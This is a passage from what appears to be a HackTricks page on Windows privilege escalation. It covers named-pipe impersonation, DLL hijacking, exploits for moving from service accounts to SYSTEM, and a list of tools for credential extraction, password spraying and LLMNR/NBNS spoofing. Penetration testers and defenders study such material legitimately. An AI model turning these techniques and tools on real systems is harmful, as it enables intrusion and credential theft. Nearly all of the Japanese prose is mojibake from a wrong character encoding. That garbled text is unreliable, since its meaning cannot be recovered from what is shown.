ãã®ææ³ã¯ meterpreter ã getsystem ãè¡ãéã«äœ¿çšããŸããææ³ã¯ããã€ããäœæãããã®ãã€ãã«æžã蟌ããµãŒãã¹ãäœæïŒæªçšããããšã§ãããããšãSeImpersonate æš©éã䜿ã£ãŠãã€ããäœæãããµãŒããŒã¯ããã€ãã¯ã©ã€ã¢ã³ãïŒãµãŒãã¹ïŒã®ããŒã¯ã³ãã€ã³ããŒãœããŒãã㊠SYSTEM æš©éãååŸã§ããŸãã
If you want to learn more about name pipes you should read this.
If you want to read an example of how to go from high integrity to System using name pipes you should read this.
Dll Hijacking
ãã SYSTEM ãšããŠåäœããããã»ã¹ã«ãã£ãŠããŒãããã DLL ã hijack ã§ããã°ããã®æš©éã§ä»»æã®ã³ãŒããå®è¡ã§ããŸãããããã£ãŠ Dll Hijacking ã¯æš©éææ Œã«æçšã§ãããããã« High Integrity process ãã㯠DLL ãããŒããããã©ã«ãã«å¯Ÿããæžã蟌ã¿æš©éãããããéæããã容æã§ãã
You can learn more about Dll hijacking here.
From Administrator or Network Service to System
- https://github.com/sailay1996/RpcSsImpersonator
- https://decoder.cloud/2020/05/04/from-network-service-to-system/
- https://github.com/decoder-it/NetworkServiceExploit
From LOCAL SERVICE or NETWORK SERVICE to full privs
Read: https://github.com/itm4n/FullPowers
More help
Useful tools
Windows ã®ããŒã«ã«æš©éææ Œãã¯ãã«ãæ¢ãããã®ãã¹ãããŒã«: WinPEAS
PS
PrivescCheck
PowerSploit-Privesc(PowerUP) â èšå®ãã¹ãæ©å¯ãã¡ã€ã«ããã§ãã¯ããŸãïŒcheck hereïŒãæ€åºæžã¿ã
JAWS â ããã€ãã®èšå®ãã¹ããã§ãã¯ããŠæ
å ±ãåéããŸãïŒcheck hereïŒã
privesc â èšå®ãã¹ããã§ãã¯ããŸã
SessionGopher â PuTTYãWinSCPãSuperPuTTYãFileZillaãRDP ã®ä¿åã»ãã·ã§ã³æ
å ±ãæœåºããŸããããŒã«ã«ã§ -Thorough ã䜿çšããŠãã ããã
Invoke-WCMDump â Credential Manager ããè³æ Œæ
å ±ãæœåºããŸããæ€åºæžã¿ã
DomainPasswordSpray â åéãããã¹ã¯ãŒãããã¡ã€ã³ã«å¯ŸããŠã¹ãã¬ãŒããŸã
Inveigh â PowerShell ããŒã¹ã® ADIDNS/LLMNR/mDNS/NBNS ã¹ããŒãã¡ãŒå
Œäžéè
ããŒã«ã§ãã
WindowsEnum â åºæ¬ç㪠Windows æš©éææ Œã®åæSherlock ~~~~ â æ¢ç¥ã®æš©éææ Œè匱æ§ãæ€çŽ¢ããŸãïŒWatson ã«ããéæšå¥šïŒWINspect â ããŒã«ã«ãã§ã㯠(管çæš©éãå¿
èŠ)
Exe
Watson â æ¢ç¥ã®æš©éææ Œè匱æ§ãæ€çŽ¢ããŸãïŒVisualStudio ã§ã®ã³ã³ãã€ã«ãå¿
èŠïŒïŒprecompiledïŒ
SeatBelt â ãã¹ããåæããŠèšå®ãã¹ãæ¢ããŸãïŒprivesc ãšããããæ
å ±åéããŒã«ïŒïŒã³ã³ãã€ã«ãå¿
èŠïŒïŒprecompiledïŒ
LaZagne â å€æ°ã®ãœããããè³æ Œæ
å ±ãæœåºããŸãïŒGitHub ã«ããªã³ã³ãã€ã«æžã¿ã® exeïŒ
SharpUP â PowerUp ã® C# 移æ€Beroot ~~~~ â èšå®ãã¹ããã§ãã¯ããŸãïŒGitHub ã«å®è¡ãã¡ã€ã«ããïŒãæšå¥šããŸãããWin10 ã§ããŸãåäœããŸãããWindows-Privesc-Check â èšå®ãã¹ã®ãã§ãã¯ïŒPython ããã® exeïŒãæšå¥šããŸãããWin10 ã§ããŸãåäœããŸããã
Bat
winPEASbat â ãã®èšäºãå ã«äœæãããããŒã«ïŒaccesschk ããªããŠãåäœããŸããã䜿çšå¯èœã§ãïŒã
Local
Windows-Exploit-Suggester â systeminfo ã®åºåãèªã¿åããåäœãããšã¯ã¹ããã€ããæšå¥šããŸãïŒããŒã«ã« PythonïŒ
Windows Exploit Suggester Next Generation â systeminfo ã®åºåãèªã¿åããåäœãããšã¯ã¹ããã€ããæšå¥šããŸãïŒããŒã«ã« PythonïŒ
Meterpreter
multi/recon/local_exploit_suggestor
ãããžã§ã¯ãã¯æ£ããããŒãžã§ã³ã® .NET ã䜿çšããŠã³ã³ãã€ã«ããå¿ èŠããããŸãïŒsee thisïŒã被害è ãã¹ãã«ã€ã³ã¹ããŒã«ãããŠãã .NET ã®ããŒãžã§ã³ã確èªããã«ã¯æ¬¡ãå®è¡ã§ããŸã:
C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the code with the version given in "Build Engine version" line
åèæç®
-
http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html
-
https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
-
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
-
https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalation.md
-
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
-
http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html
-
HTB Reaper: Format-string leak + stack BOF â VirtualAlloc ROP (RCE) and kernel token theft
-
Check Point Research â Chasing the Silver Fox: Cat & Mouse in Kernel Shadows
Tip
AWSãããã³ã°ãåŠã³ãå®è·µããïŒ
GCPãããã³ã°ãåŠã³ãå®è·µããïŒHackTricksããµããŒããã
- ãµãã¹ã¯ãªãã·ã§ã³ãã©ã³ã確èªããŠãã ããïŒ
- **ð¬ Discordã°ã«ãŒããŸãã¯ãã¬ã°ã©ã ã°ã«ãŒãã«åå ããããTwitter ðŠ @hacktricks_liveããã©ããŒããŠãã ããã
- HackTricksããã³HackTricks Cloudã®GitHubãªããžããªã«PRãæåºããŠãããã³ã°ããªãã¯ãå ±æããŠãã ããã